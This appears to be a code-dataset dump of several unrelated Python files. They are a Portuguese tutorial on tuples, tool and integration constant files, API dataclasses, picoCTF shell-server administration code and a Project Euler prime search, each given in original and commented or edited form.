9869308c3f4a32c54000e48993e39c0f4609d453 | 3,017 | py | Python | ExerciciosPython/aula016.py | MecaFlavio/Exercicios-Python-3-Curso-em-Video | b93272c15b19b04deff73f1b0a684a0b49313edf | [
"MIT"
] | null | null | null | ExerciciosPython/aula016.py | MecaFlavio/Exercicios-Python-3-Curso-em-Video | b93272c15b19b04deff73f1b0a684a0b49313edf | [
"MIT"
] | null | null | null | ExerciciosPython/aula016.py | MecaFlavio/Exercicios-Python-3-Curso-em-Video | b93272c15b19b04deff73f1b0a684a0b49313edf | [
"MIT"
] | null | null | null | # Aula 16 - Vaiaveis compostas: Tuplas
lanche = ('hamburger', 'suco', 'pizza', 'pudim') # tupla criada, pode ser criada sem parenteses np python 3
print(lanche) # mostra a tupla em parenteses e os seus elementos
print(lanche[1]) # mostra o elemento 1 da tupla
print(lanche[-1]) # mostra o elemento -1 da tupla
# Tuplas recebem indices numericos crescentes e decrescentes ex: 0,1,2 e -1,-2,-3 respectivamente
print(lanche[3]) # mostra o elemento 3 da tupla
print(lanche[-2]) # mostra o elemento - 2 da tupla
print(lanche[1:3]) # imprime do elemento 1 ao elemento 2 desconsiderando o elemento 3
print(lanche[2:]) # imprime o elemento 2 até o ultimo
print(lanche[:2]) # imprime do início até o elemento 1 ignorando o elemento 2
print(lanche[-2:]) # imprime do -2 até o final, pizza até pudim
print(lanche[3:-5:-1]) # imprime do elemento 3 ao 0 em ordem decrescente
## lanche[1] = refrigerante # retorna erro, tuplas são imutáveis durante a execução do programa.
print(lanche)
# Percorre o for para cada elemento indexado da Tupla
for comida in lanche:
print(f'Eu vou comer {comida};')
print('Comi pra caramba')
print(len(lanche)) # mostra a quantidade de elementos da tupla
# O range vai de 0 à quantidade de elementos da tupla lanche = (4)
# Por tanto mostra o indice correspondentes de 0 a 3
for cont1 in range(0, 4): # pode ser lido, 'mostre 4 resultados iniciando do 0. 0,1,2,3 = 4 resultados
print(cont1)
for cont in range(0, len(lanche)):
print(lanche[cont])
for cont2 in range(0, len(lanche)):
print(f'Eu vou comer {lanche[cont2]} na posição {cont2}')
# Metodo enumerate retorna uma tupla para cada elemento na tupla lanche
# no primeiro indice ele aloca o número no segundo indice aloca o elemento
# após o for aponto duas variaveis se quiser guadar separadamente
for pos, comida in enumerate(lanche):
print(f'Eu vou comer {comida} na posição {pos}')
# O metoto sorted cria lista com a tupla e organiza em ordem alfabetica
print(sorted(lanche))
a = (2, 5, 4)
b = (5, 8, 1, 2)
c = a + b
# soma de tuplas realiza a comutação de elementos, ou seja, apenas junta os elementos numa terceira tupla
print(c)
# Nesse caso, por tanto, a + b não sera igual b + a.. A ordem da soma influencia em como os elementos serão indexados
c = b + a
print(c)
print(len(c)) # imprime o número de elementos de c
print(c)
print(c.count(5)) # mosta a quantidade de elementos 5 que a tupla possui
print(c.count(4)) # mostra a quantidade de elementos 4 na tupla
print(c.count(9)) # mostra que não possui o elemento
print(c.index(8)) # mostra o indice do elemento
print(c.index(4)) # mostra o indice do elemento
print(c.index(5)) # mostra o indice do elemento, na caso do primeiro encontrado
print(c.index(5, 1)) # mostra o indice do elemento a partir do indice 1
# Uma tupla pode receber elementos de tipos diferentes
pessoa = ('Flavio', 32, 'Casado', 'peso', 110)
print(pessoa)
# É possivel deletar uma tupla durante a execução do programa com o comando del
del lanche
print(lanche)
| 41.902778 | 117 | 0.724892 | # Aula 16 - Vaiaveis compostas: Tuplas
# Lesson 16 - Compound variables: tuples
# (comments translated to English; program output unchanged)
lanche = ('hamburger', 'suco', 'pizza', 'pudim')  # tuple literal; parentheses are optional in Python 3
print(lanche)  # prints the whole tuple with parentheses
print(lanche[1])  # element at index 1
print(lanche[-1])  # last element
# Tuples are indexed forward (0, 1, 2...) and backward (-1, -2, -3...).
print(lanche[3])  # element at index 3
print(lanche[-2])  # second-to-last element
print(lanche[1:3])  # slice from index 1 up to (not including) 3
print(lanche[2:])  # from index 2 to the end
print(lanche[:2])  # from the start up to (not including) index 2
print(lanche[-2:])  # from index -2 to the end ('pizza' and 'pudim')
print(lanche[3:-5:-1])  # indices 3 down to 0, i.e. the tuple reversed
# lanche[1] = 'refrigerante'  # would raise TypeError: tuples are immutable
print(lanche)
# A for loop visits each element of the tuple in order.
for comida in lanche:
    print(f'Eu vou comer {comida};')
print('Comi pra caramba')
print(len(lanche))  # number of elements in the tuple
# range(0, 4) yields the indices 0, 1, 2, 3.
for cont1 in range(0, 4):
    print(cont1)
for cont in range(0, len(lanche)):
    print(lanche[cont])
for cont2 in range(0, len(lanche)):
    print(f'Eu vou comer {lanche[cont2]} na posição {cont2}')
# enumerate() yields (index, element) pairs, unpacked into two names.
for pos, comida in enumerate(lanche):
    print(f'Eu vou comer {comida} na posição {pos}')
# sorted() returns a new LIST with the elements in alphabetical order.
print(sorted(lanche))
a = (2, 5, 4)
b = (5, 8, 1, 2)
c = a + b
# "Adding" tuples concatenates their elements into a new tuple.
print(c)
# Concatenation is order-sensitive, so a + b != b + a.
c = b + a
print(c)
print(len(c))  # number of elements in c
print(c)
print(c.count(5))  # how many times 5 appears in the tuple
print(c.count(4))  # how many times 4 appears
print(c.count(9))  # 0: the value 9 is not present
print(c.index(8))  # index of the first occurrence of 8
print(c.index(4))  # index of the first occurrence of 4
print(c.index(5))  # index of the FIRST occurrence of 5
print(c.index(5, 1))  # first occurrence of 5 searching from index 1
# A tuple may mix values of different types.
pessoa = ('Flavio', 32, 'Casado', 'peso', 110)
print(pessoa)
# del removes the whole tuple object (not individual elements).
del lanche
# BUG FIX: the original printed `lanche` right after deleting it, which
# raised NameError and crashed the script.  Demonstrate the effect of
# `del` safely instead.
try:
    print(lanche)
except NameError:
    print('lanche não existe mais')
| 0 | 0 | 0 |
ae8673c11ee0d05cecd9bcd7bafd2969050210b0 | 35 | py | Python | src/common/definitions.py | mehrdad-shokri/macro_pack | bcc39728ae70f99e95998cbb48a8beb9e7697031 | [
"Apache-2.0"
] | 3 | 2020-10-10T01:55:54.000Z | 2021-09-30T11:49:02.000Z | src/common/definitions.py | mehrdad-shokri/macro_pack | bcc39728ae70f99e95998cbb48a8beb9e7697031 | [
"Apache-2.0"
] | null | null | null | src/common/definitions.py | mehrdad-shokri/macro_pack | bcc39728ae70f99e95998cbb48a8beb9e7697031 | [
"Apache-2.0"
] | 1 | 2022-03-26T00:55:01.000Z | 2022-03-26T00:55:01.000Z |
# Package-wide constants for macro_pack.
VERSION="1.9.4"  # tool version string
LOGLEVEL = "INFO"  # default logging verbosity
# Package-wide constants for macro_pack.
VERSION="1.9.4"  # tool version string
LOGLEVEL = "INFO"  # default logging verbosity
b4711b50dd2309b5e08e0c12639a56fa2342aea3 | 675 | py | Python | homeassistant/components/airly/const.py | miccico/core | 14c205384171dee59c1a908f8449f9864778b2dc | [
"Apache-2.0"
] | 6 | 2017-08-02T19:26:39.000Z | 2020-03-14T22:47:41.000Z | homeassistant/components/airly/const.py | miccico/core | 14c205384171dee59c1a908f8449f9864778b2dc | [
"Apache-2.0"
] | 54 | 2020-11-17T07:04:57.000Z | 2022-03-31T06:45:39.000Z | homeassistant/components/airly/const.py | miccico/core | 14c205384171dee59c1a908f8449f9864778b2dc | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Constants for Airly integration."""
# --- Keys into the Airly API measurement payload ---
ATTR_API_ADVICE = "ADVICE"
ATTR_API_CAQI = "CAQI"
ATTR_API_CAQI_DESCRIPTION = "DESCRIPTION"
ATTR_API_CAQI_LEVEL = "LEVEL"
ATTR_API_HUMIDITY = "HUMIDITY"
ATTR_API_PM1 = "PM1"
ATTR_API_PM10 = "PM10"
ATTR_API_PM10_LIMIT = "PM10_LIMIT"
ATTR_API_PM10_PERCENT = "PM10_PERCENT"
ATTR_API_PM25 = "PM25"
ATTR_API_PM25_LIMIT = "PM25_LIMIT"
ATTR_API_PM25_PERCENT = "PM25_PERCENT"
ATTR_API_PRESSURE = "PRESSURE"
ATTR_API_TEMPERATURE = "TEMPERATURE"
# --- Integration configuration / identity ---
CONF_USE_NEAREST = "use_nearest"  # config flag: use nearest station instead of exact coordinates
DEFAULT_NAME = "Airly"
DOMAIN = "airly"
MANUFACTURER = "Airly sp. z o.o."
MAX_REQUESTS_PER_DAY = 100  # presumably the free API quota — TODO confirm against current Airly plan
NO_AIRLY_SENSORS = "There are no Airly sensors in this area yet."  # user-facing message
| 30.681818 | 65 | 0.786667 | """Constants for Airly integration."""
# --- Keys into the Airly API measurement payload ---
ATTR_API_ADVICE = "ADVICE"
ATTR_API_CAQI = "CAQI"
ATTR_API_CAQI_DESCRIPTION = "DESCRIPTION"
ATTR_API_CAQI_LEVEL = "LEVEL"
ATTR_API_HUMIDITY = "HUMIDITY"
ATTR_API_PM1 = "PM1"
ATTR_API_PM10 = "PM10"
ATTR_API_PM10_LIMIT = "PM10_LIMIT"
ATTR_API_PM10_PERCENT = "PM10_PERCENT"
ATTR_API_PM25 = "PM25"
ATTR_API_PM25_LIMIT = "PM25_LIMIT"
ATTR_API_PM25_PERCENT = "PM25_PERCENT"
ATTR_API_PRESSURE = "PRESSURE"
ATTR_API_TEMPERATURE = "TEMPERATURE"
# --- Integration configuration / identity ---
CONF_USE_NEAREST = "use_nearest"  # config flag: use nearest station instead of exact coordinates
DEFAULT_NAME = "Airly"
DOMAIN = "airly"
MANUFACTURER = "Airly sp. z o.o."
MAX_REQUESTS_PER_DAY = 100  # presumably the free API quota — TODO confirm against current Airly plan
NO_AIRLY_SENSORS = "There are no Airly sensors in this area yet."  # user-facing message
| 0 | 0 | 0 |
8c16acba335b485450860d2503f0893ea8f879a0 | 803 | py | Python | bettermonitoring/models.py | SayHelloRoman/BetterMonitoring | a26af6a9ab01660c0445d92f25b8ed14f63aa03d | [
"MIT"
] | 5 | 2022-03-26T17:19:23.000Z | 2022-03-27T19:46:09.000Z | bettermonitoring/models.py | SayHelloRoman/BetterMonitoring | a26af6a9ab01660c0445d92f25b8ed14f63aa03d | [
"MIT"
] | null | null | null | bettermonitoring/models.py | SayHelloRoman/BetterMonitoring | a26af6a9ab01660c0445d92f25b8ed14f63aa03d | [
"MIT"
] | 2 | 2022-03-26T17:19:31.000Z | 2022-03-26T18:57:38.000Z | from typing import List, Optional
from dataclasses import dataclass
@dataclass
@dataclass
@dataclass
@dataclass | 14.87037 | 34 | 0.620174 | from typing import List, Optional
from dataclasses import dataclass
@dataclass
class Bot:
    """A bot listing as returned by the BetterMonitoring API."""

    avatar: str  # avatar image reference
    botID: str  # bot identifier — presumably a Discord snowflake string; TODO confirm
    username: str
    discrim: str  # discriminator (the #NNNN tag suffix)
    shortDesc: str  # short description shown in listings
    prefix: str  # command prefix
    votes: int
    ownerID: str
    coowners: List[str]
    tags: List[str]
    longDesc: str  # full description page content
    background: str
    certificate: str
    github: str
    support: str  # support link
    website: str
    owner: str = ""  # optional display name of the owner
@dataclass
class User:
    """A user profile as returned by the BetterMonitoring API."""

    id: str
    biography: str
    website: str
    github: str
    instagram: str
    twitter: Optional[str] = None  # only optional social link in the API payload
@dataclass
class Server:
    """A server listing as returned by the BetterMonitoring API."""

    id: str
    avatar: str
    name: str
    owner: str
    shortDesc: str  # short description shown in listings
    longDesc: str  # full description page content
    votes: int
    bumps: int
    tags: list
@dataclass
class Comment:
    """A review/comment left on a listing."""

    author: str
    star_rate: str  # rating — kept as str, matching the raw API payload
    message: str
    date: float  # presumably a Unix timestamp — TODO confirm
3e0c262fa2f0a9220966a57cff9f22df7b123f5f | 10,939 | py | Python | picoCTF-web/api/shell_servers.py | NNHSSE201819/picoCTF | eae563c2e68dce85a1c426d086b422dc25649003 | [
"MIT"
] | null | null | null | picoCTF-web/api/shell_servers.py | NNHSSE201819/picoCTF | eae563c2e68dce85a1c426d086b422dc25649003 | [
"MIT"
] | null | null | null | picoCTF-web/api/shell_servers.py | NNHSSE201819/picoCTF | eae563c2e68dce85a1c426d086b422dc25649003 | [
"MIT"
] | null | null | null | import json
import api
import pymongo
import spur
from api.common import (check, InternalException, safe_fail, validate,
WebException)
from voluptuous import Length, Required, Schema
server_schema = Schema(
{
Required("name"):
check(
("Name must be a reasonable string.", [str,
Length(min=1, max=128)])),
Required("host"):
check(
("Host must be a reasonable string", [str,
Length(min=1, max=128)])),
Required("port"):
check(("You have to supply a valid integer for your port.", [int]),
("Your port number must be in the valid range 1-65535.",
[lambda x: 1 <= int(x) and int(x) <= 65535])),
Required("username"):
check(("Username must be a reasonable string",
[str, Length(min=1, max=128)])),
Required("password"):
check(("Username must be a reasonable string",
[str, Length(min=1, max=128)])),
Required("protocol"):
check(("Protocol must be either HTTP or HTTPS",
[lambda x: x in ['HTTP', 'HTTPS']])),
"server_number":
check(("Server number must be an integer.", [int]),
("Server number must be a positive integer.",
[lambda x: 0 < int(x)])),
},
extra=True)
def get_server(sid=None, name=None):
"""
Returns the server object corresponding to the sid provided
Args:
sid: the server id to lookup
Returns:
The server object
"""
db = api.common.get_conn()
if sid is None:
if name is None:
raise InternalException("You must specify either an sid or name")
else:
sid = api.common.hash(name)
server = db.shell_servers.find_one({"sid": sid})
if server is None:
raise InternalException(
"Server with sid '{}' does not exist".format(sid))
return server
def get_server_number(sid):
"""
Gets the server_number designation from sid
"""
if sid is None:
raise InternalException("You must specify a sid")
server = get_server(sid=sid)
if server is None:
raise InternalException(
"Server with sid '{}' does not exist".format(sid))
return server.get("server_number")
def get_connection(sid):
    """
    Open an SSH connection to the shell server identified by sid.

    Args:
        sid: the server id to connect to

    Returns:
        A connected spur.SshShell.

    Raises:
        WebException: if the server cannot be reached with its stored
            credentials.
    """
    server = get_server(sid)

    try:
        shell = spur.SshShell(
            hostname=server["host"],
            username=server["username"],
            password=server["password"],
            port=server["port"],
            missing_host_key=spur.ssh.MissingHostKey.accept,
            connect_timeout=10)
        # Run a no-op command to force the connection to actually open.
        shell.run(["echo", "connected"])
    except spur.ssh.ConnectionError as e:
        # BUG FIX: the caught exception was bound but unused; chain it so
        # the underlying SSH failure details are preserved for debugging.
        raise WebException(
            "Cannot connect to {}@{}:{} with the specified password".format(
                server["username"], server["host"], server["port"])) from e

    return shell
def ensure_setup(shell):
"""
Runs sanity checks on the shell connection to ensure that
shell_manager is set up correctly.
Leaves connection open.
"""
result = shell.run(
["sudo", "/picoCTF-env/bin/shell_manager", "status"], allow_error=True)
if result.return_code == 1 and "command not found" in result.stderr_output.decode(
"utf-8"):
raise WebException("shell_manager not installed on server.")
def add_server(params):
"""
Add a shell server to the pool of servers. First server is
automatically assigned server_number 1 (yes, 1-based numbering)
if not otherwise specified.
Args:
params: A dict containing:
host
port
username
password
server_number
Returns:
The sid.
"""
db = api.common.get_conn()
validate(server_schema, params)
if isinstance(params["port"], str):
params["port"] = int(params["port"])
if isinstance(params.get("server_number"), str):
params["server_number"] = int(params["server_number"])
if safe_fail(get_server, name=params["name"]) is not None:
raise WebException("Shell server with this name already exists")
params["sid"] = api.common.hash(params["name"])
# Automatically set first added server as server_number 1
if db.shell_servers.count() == 0:
params["server_number"] = params.get("server_number", 1)
db.shell_servers.insert(params)
return params["sid"]
# Probably do not need/want the sid here anymore.
def update_server(sid, params):
    """
    Update a shell server from the pool of servers.

    Args:
        sid: The sid of the server to update
        params: A dict containing port, username, password, server_number
            ("name" is taken from the stored record, not from params)

    Raises:
        WebException: if no server with sid exists or params are invalid.
    """
    db = api.common.get_conn()

    server = safe_fail(get_server, sid=sid)
    if server is None:
        raise WebException(
            "Shell server with sid '{}' does not exist.".format(sid))

    # BUG FIX: validation previously ran twice, the first time before the
    # required "name" key was copied from the stored record, which would
    # reject otherwise-valid updates.  Populate name first, validate once.
    params["name"] = server["name"]
    validate(server_schema, params)

    # Coerce numeric fields that may arrive as strings from a form.
    if isinstance(params["port"], str):
        params["port"] = int(params["port"])
    if isinstance(params.get("server_number"), str):
        params["server_number"] = int(params["server_number"])

    db.shell_servers.update({"sid": server["sid"]}, {"$set": params})
def remove_server(sid):
"""
Remove a shell server from the pool of servers.
Args:
sid: the sid of the server to be removed
"""
db = api.common.get_conn()
if db.shell_servers.find_one({"sid": sid}) is None:
raise WebException(
"Shell server with sid '{}' does not exist.".format(sid))
db.shell_servers.remove({"sid": sid})
def get_servers(get_all=False):
"""
Returns the list of added shell servers, or the assigned shell server
shard if sharding is enabled. Defaults to server 1 if not assigned
"""
db = api.common.get_conn()
settings = api.config.get_settings()
match = {}
if not get_all and settings["shell_servers"]["enable_sharding"]:
team = api.team.get_team()
match = {"server_number": team.get("server_number", 1)}
servers = list(db.shell_servers.find(match, {"_id": 0}))
if len(servers) == 0 and settings["shell_servers"]["enable_sharding"]:
raise InternalException(
"Your assigned shell server is currently down. Please contact an admin."
)
return servers
def get_problem_status_from_server(sid):
"""
Connects to the server and checks the status of the problems running there.
Runs `sudo shell_manager status --json` and parses its output.
Closes connection after running command.
Args:
sid: The sid of the server to check
Returns:
A tuple containing:
- True if all problems are online and false otherwise
- The output data of shell_manager status --json
"""
shell = get_connection(sid)
ensure_setup(shell)
with shell:
output = shell.run(
["sudo", "/picoCTF-env/bin/shell_manager", "status",
"--json"]).output.decode("utf-8")
data = json.loads(output)
all_online = True
for problem in data["problems"]:
for instance in problem["instances"]:
# if the service is not working
if not instance["service"]:
all_online = False
# if the connection is not working and it is a remote challenge
if not instance["connection"] and instance["port"] is not None:
all_online = False
return (all_online, data)
def load_problems_from_server(sid):
"""
Connects to the server and loads the problems from its deployment state.
Runs `sudo shell_manager publish` and captures its output.
Closes connection after running command.
Args:
sid: The sid of the server to load problems from.
Returns:
The number of problems loaded
"""
shell = get_connection(sid)
with shell:
result = shell.run(["sudo", "/picoCTF-env/bin/shell_manager", "publish"])
data = json.loads(result.output.decode("utf-8"))
# Pass along the server
data["sid"] = sid
api.problem.load_published(data)
has_instances = lambda p: len(p["instances"]) > 0
return len(list(filter(has_instances, data["problems"])))
def get_assigned_server_number(new_team=True, tid=None):
"""
Assigns a server number based on current teams count and
configured stepping
Returns:
(int) server_number
"""
settings = api.config.get_settings()["shell_servers"]
db = api.common.get_conn()
if new_team:
team_count = db.teams.count()
else:
if not tid:
raise InternalException("tid must be specified.")
oid = db.teams.find_one({"tid": tid}, {"_id": 1})
if not oid:
raise InternalException("Invalid tid.")
team_count = db.teams.count({"_id": {"$lt": oid["_id"]}})
assigned_number = 1
steps = settings["steps"]
if steps:
if team_count < steps[-1]:
for i, step in enumerate(steps):
if team_count < step:
assigned_number = i + 1
break
else:
assigned_number = 1 + len(steps) + (
team_count - steps[-1]) // settings["default_stepping"]
else:
assigned_number = team_count // settings["default_stepping"] + 1
if settings["limit_added_range"]:
max_number = list(
db.shell_servers.find({}, {
"server_number": 1
}).sort("server_number", -1).limit(1))[0]["server_number"]
return min(max_number, assigned_number)
else:
return assigned_number
| 28.339378 | 86 | 0.588811 | import json
import api
import pymongo
import spur
from api.common import (check, InternalException, safe_fail, validate,
WebException)
from voluptuous import Length, Required, Schema
# Voluptuous schema validating shell-server records.  extra=True allows
# stored documents to carry additional fields beyond those listed here.
server_schema = Schema(
    {
        Required("name"):
        check(
            ("Name must be a reasonable string.", [str,
                                                   Length(min=1, max=128)])),
        Required("host"):
        check(
            ("Host must be a reasonable string", [str,
                                                  Length(min=1, max=128)])),
        Required("port"):
        check(("You have to supply a valid integer for your port.", [int]),
              ("Your port number must be in the valid range 1-65535.",
               [lambda x: 1 <= int(x) and int(x) <= 65535])),
        Required("username"):
        check(("Username must be a reasonable string",
               [str, Length(min=1, max=128)])),
        Required("password"):
        check(("Username must be a reasonable string",
               [str, Length(min=1, max=128)])),
        Required("protocol"):
        check(("Protocol must be either HTTP or HTTPS",
               [lambda x: x in ['HTTP', 'HTTPS']])),
        # server_number is optional: assigned automatically when absent.
        "server_number":
        check(("Server number must be an integer.", [int]),
              ("Server number must be a positive integer.",
               [lambda x: 0 < int(x)])),
    },
    extra=True)
def get_server(sid=None, name=None):
    """
    Look up a shell server document by sid or by name.

    Args:
        sid: the server id to look up; when omitted, derived from name
        name: the server name, hashed into an sid when sid is not given

    Returns:
        The server document.

    Raises:
        InternalException: if neither argument is given or no server matches.
    """
    conn = api.common.get_conn()

    if sid is None and name is None:
        raise InternalException("You must specify either an sid or name")
    if sid is None:
        sid = api.common.hash(name)

    server = conn.shell_servers.find_one({"sid": sid})
    if server is not None:
        return server
    raise InternalException(
        "Server with sid '{}' does not exist".format(sid))
def get_server_number(sid):
    """
    Gets the server_number designation from sid.

    Args:
        sid: the server id to look up (required)

    Returns:
        The server's server_number (may be None if never assigned).

    Raises:
        InternalException: if sid is None or no such server exists
            (raised by get_server).
    """
    if sid is None:
        raise InternalException("You must specify a sid")
    # Dead-code fix: get_server raises InternalException itself when the
    # server is missing and never returns None, so the old redundant
    # None-check after this call was removed.
    server = get_server(sid=sid)
    return server.get("server_number")
def get_connection(sid):
    """
    Open an SSH connection to the shell server identified by sid.

    Args:
        sid: the server id to connect to

    Returns:
        A connected spur.SshShell.

    Raises:
        WebException: if the server cannot be reached with its stored
            credentials.
    """
    server = get_server(sid)

    try:
        shell = spur.SshShell(
            hostname=server["host"],
            username=server["username"],
            password=server["password"],
            port=server["port"],
            missing_host_key=spur.ssh.MissingHostKey.accept,
            connect_timeout=10)
        # Run a no-op command to force the connection to actually open.
        shell.run(["echo", "connected"])
    except spur.ssh.ConnectionError as e:
        # BUG FIX: the caught exception was bound but unused; chain it so
        # the underlying SSH failure details are preserved for debugging.
        raise WebException(
            "Cannot connect to {}@{}:{} with the specified password".format(
                server["username"], server["host"], server["port"])) from e

    return shell
def ensure_setup(shell):
    """
    Sanity-check that shell_manager is installed on the remote host.

    Leaves the connection open.

    Raises:
        WebException: when the shell_manager command is missing.
    """
    result = shell.run(
        ["sudo", "/picoCTF-env/bin/shell_manager", "status"], allow_error=True)
    # Keep the short-circuit order: stderr is only decoded on failure.
    missing = (
        result.return_code == 1
        and "command not found" in result.stderr_output.decode("utf-8")
    )
    if missing:
        raise WebException("shell_manager not installed on server.")
def add_server(params):
    """
    Register a new shell server in the pool.

    The very first server added defaults to server_number 1 (yes,
    1-based numbering) unless one is supplied.

    Args:
        params: A dict containing name, host, port, username, password,
            protocol and optionally server_number.

    Returns:
        The new server's sid.

    Raises:
        WebException: if a server with the same name already exists.
    """
    conn = api.common.get_conn()

    validate(server_schema, params)

    # Coerce numeric fields that may arrive as strings from a form.
    for field in ("port", "server_number"):
        if isinstance(params.get(field), str):
            params[field] = int(params[field])

    if safe_fail(get_server, name=params["name"]) is not None:
        raise WebException("Shell server with this name already exists")

    params["sid"] = api.common.hash(params["name"])

    # The first server ever added gets server_number 1 by default.
    if conn.shell_servers.count() == 0:
        params["server_number"] = params.get("server_number", 1)

    conn.shell_servers.insert(params)
    return params["sid"]
# Probably do not need/want the sid here anymore.
def update_server(sid, params):
    """
    Update a shell server from the pool of servers.

    Args:
        sid: The sid of the server to update
        params: A dict containing port, username, password, server_number
            ("name" is taken from the stored record, not from params)

    Raises:
        WebException: if no server with sid exists or params are invalid.
    """
    db = api.common.get_conn()

    server = safe_fail(get_server, sid=sid)
    if server is None:
        raise WebException(
            "Shell server with sid '{}' does not exist.".format(sid))

    # BUG FIX: validation previously ran twice, the first time before the
    # required "name" key was copied from the stored record, which would
    # reject otherwise-valid updates.  Populate name first, validate once.
    params["name"] = server["name"]
    validate(server_schema, params)

    # Coerce numeric fields that may arrive as strings from a form.
    if isinstance(params["port"], str):
        params["port"] = int(params["port"])
    if isinstance(params.get("server_number"), str):
        params["server_number"] = int(params["server_number"])

    db.shell_servers.update({"sid": server["sid"]}, {"$set": params})
def remove_server(sid):
    """
    Delete the shell server with sid from the pool.

    Args:
        sid: the sid of the server to be removed

    Raises:
        WebException: if no such server exists.
    """
    conn = api.common.get_conn()

    existing = conn.shell_servers.find_one({"sid": sid})
    if existing is None:
        raise WebException(
            "Shell server with sid '{}' does not exist.".format(sid))

    conn.shell_servers.remove({"sid": sid})
def get_servers(get_all=False):
    """
    Return the list of added shell servers, or only the caller's
    assigned shard when sharding is enabled (defaulting to server 1
    for unassigned teams).
    """
    conn = api.common.get_conn()
    settings = api.config.get_settings()

    query = {}
    if not get_all and settings["shell_servers"]["enable_sharding"]:
        team = api.team.get_team()
        query = {"server_number": team.get("server_number", 1)}

    servers = list(conn.shell_servers.find(query, {"_id": 0}))
    if not servers and settings["shell_servers"]["enable_sharding"]:
        raise InternalException(
            "Your assigned shell server is currently down. Please contact an admin."
        )
    return servers
def get_problem_status_from_server(sid):
    """
    Check the status of the problems deployed on a shell server.

    Runs `sudo shell_manager status --json` over SSH and parses its
    output.  The connection is closed before returning.

    Args:
        sid: The sid of the server to check

    Returns:
        A tuple (all_online, data): all_online is True only when every
        instance's service is up and, for remote challenges, the
        connection works too; data is the parsed status JSON.
    """
    shell = get_connection(sid)
    ensure_setup(shell)

    with shell:
        raw = shell.run(
            ["sudo", "/picoCTF-env/bin/shell_manager", "status",
             "--json"]).output.decode("utf-8")
    data = json.loads(raw)

    all_online = True
    for problem in data["problems"]:
        for instance in problem["instances"]:
            service_up = instance["service"]
            # A remote challenge (non-None port) must also be reachable.
            remote_down = (
                instance["port"] is not None and not instance["connection"])
            if not service_up or remote_down:
                all_online = False

    return (all_online, data)
def load_problems_from_server(sid):
    """
    Import published problems from a shell server's deployment state.

    Runs `sudo shell_manager publish` over SSH, feeds the output to
    api.problem.load_published and closes the connection.

    Args:
        sid: The sid of the server to load problems from.

    Returns:
        The number of problems that have at least one deployed instance.
    """
    shell = get_connection(sid)

    with shell:
        result = shell.run(["sudo", "/picoCTF-env/bin/shell_manager", "publish"])
    data = json.loads(result.output.decode("utf-8"))

    # Tag the published data with its originating server.
    data["sid"] = sid

    api.problem.load_published(data)

    # Idiom fix (PEP 8 E731): replaced a lambda + filter + list round
    # trip with a direct generator-expression count.
    return sum(1 for problem in data["problems"] if problem["instances"])
def get_assigned_server_number(new_team=True, tid=None):
    """
    Assigns a server number based on current teams count and
    configured stepping.

    Args:
        new_team: when True, base the assignment on the total team count;
            when False, base it on the given team's registration order.
        tid: required when new_team is False — the team to look up.

    Returns:
        (int) server_number
    """
    settings = api.config.get_settings()["shell_servers"]
    db = api.common.get_conn()

    if new_team:
        team_count = db.teams.count()
    else:
        if not tid:
            raise InternalException("tid must be specified.")
        oid = db.teams.find_one({"tid": tid}, {"_id": 1})
        if not oid:
            raise InternalException("Invalid tid.")
        # Count teams created before this one (ObjectIds sort by creation
        # time), so an existing team gets a stable assignment.
        team_count = db.teams.count({"_id": {"$lt": oid["_id"]}})

    assigned_number = 1

    steps = settings["steps"]
    if steps:
        if team_count < steps[-1]:
            # Within the configured thresholds: the first step larger
            # than team_count decides the server (1-based).
            for i, step in enumerate(steps):
                if team_count < step:
                    assigned_number = i + 1
                    break
        else:
            # Past the configured steps: continue in fixed-size strides.
            assigned_number = 1 + len(steps) + (
                team_count - steps[-1]) // settings["default_stepping"]
    else:
        # No explicit steps configured: pure fixed-size strides.
        assigned_number = team_count // settings["default_stepping"] + 1

    if settings["limit_added_range"]:
        # Clamp to the highest server_number actually registered.
        max_number = list(
            db.shell_servers.find({}, {
                "server_number": 1
            }).sort("server_number", -1).limit(1))[0]["server_number"]
        return min(max_number, assigned_number)
    else:
        return assigned_number
def reassign_teams(include_assigned=False):
    """
    Recompute shell-server shard assignments for teams.

    Args:
        include_assigned: when True, re-evaluate every team; otherwise
            only teams that have no server_number yet.

    Returns:
        The number of teams examined (not only those changed).
    """
    db = api.common.get_conn()

    if include_assigned:
        teams = api.team.get_all_teams(show_ineligible=True)
    else:
        # Only teams that were never assigned a shard.
        teams = list(
            db.teams.find({
                "server_number": {
                    "$exists": False
                }
            }, {
                "_id": 0,
                "tid": 1
            }))

    for team in teams:
        old_server_number = team.get("server_number")
        server_number = get_assigned_server_number(
            new_team=False, tid=team["tid"])
        if old_server_number != server_number:
            # Moving shards invalidates deployed problem instances, so
            # they are reset alongside the new server_number.
            db.teams.update({
                'tid': team["tid"]
            }, {'$set': {
                'server_number': server_number,
                'instances': {}
            }})
            # Re-assign instances
            safe_fail(api.problem.get_visible_problems, team["tid"])

    return len(teams)
| 909 | 0 | 23 |
beaff1178d4740cb4337f374ec7eb5c81cf74ca9 | 494 | py | Python | project_euler/49.py | huangshenno1/project_euler | 8a3c91fd11bcb6a6a830e963b1d5aed3f5ff787d | [
"MIT"
] | null | null | null | project_euler/49.py | huangshenno1/project_euler | 8a3c91fd11bcb6a6a830e963b1d5aed3f5ff787d | [
"MIT"
] | null | null | null | project_euler/49.py | huangshenno1/project_euler | 8a3c91fd11bcb6a6a830e963b1d5aed3f5ff787d | [
"MIT"
] | null | null | null | maxn = 10000
isprime = [False] * 2 + [True] * maxn
for i in range(2, maxn):
if isprime[i]:
j = i*i
while j < maxn:
isprime[j] = False
j += i
for a in range(1000, 10000):
if isprime[a]:
code = encode(a)
for inc in range(1, 4500):
b = a + inc
c = a + inc * 2
if c >= 10000:
break
if isprime[b] and isprime[c]:
if encode(b) == code and encode(c) == code:
print a, b, c
# Sieve of Eratosthenes: after this loop, isprime[i] is True iff i is
# prime, for all i < maxn.
maxn = 10000
isprime = [False] * 2 + [True] * maxn
for i in range(2, maxn):
    if isprime[i]:
        # Composites below i*i were already crossed out by smaller primes.
        j = i*i
        while j < maxn:
            isprime[j] = False
            j += i
def encode(x):
    """Return a permutation-invariant signature of x's decimal digits.

    The signature is the sum of the cubes of the digits, so two numbers
    whose digits are permutations of each other always share a code.
    (Distinct digit multisets could collide in principle — this is a
    fast filter for the Project Euler 49 search, not an exact test.)
    """
    ret = 0
    while x > 0:
        ret += (x % 10) ** 3
        # BUG FIX: use floor division so the digit loop also terminates
        # correctly under Python 3, where `/` is true division.
        x //= 10
    return ret
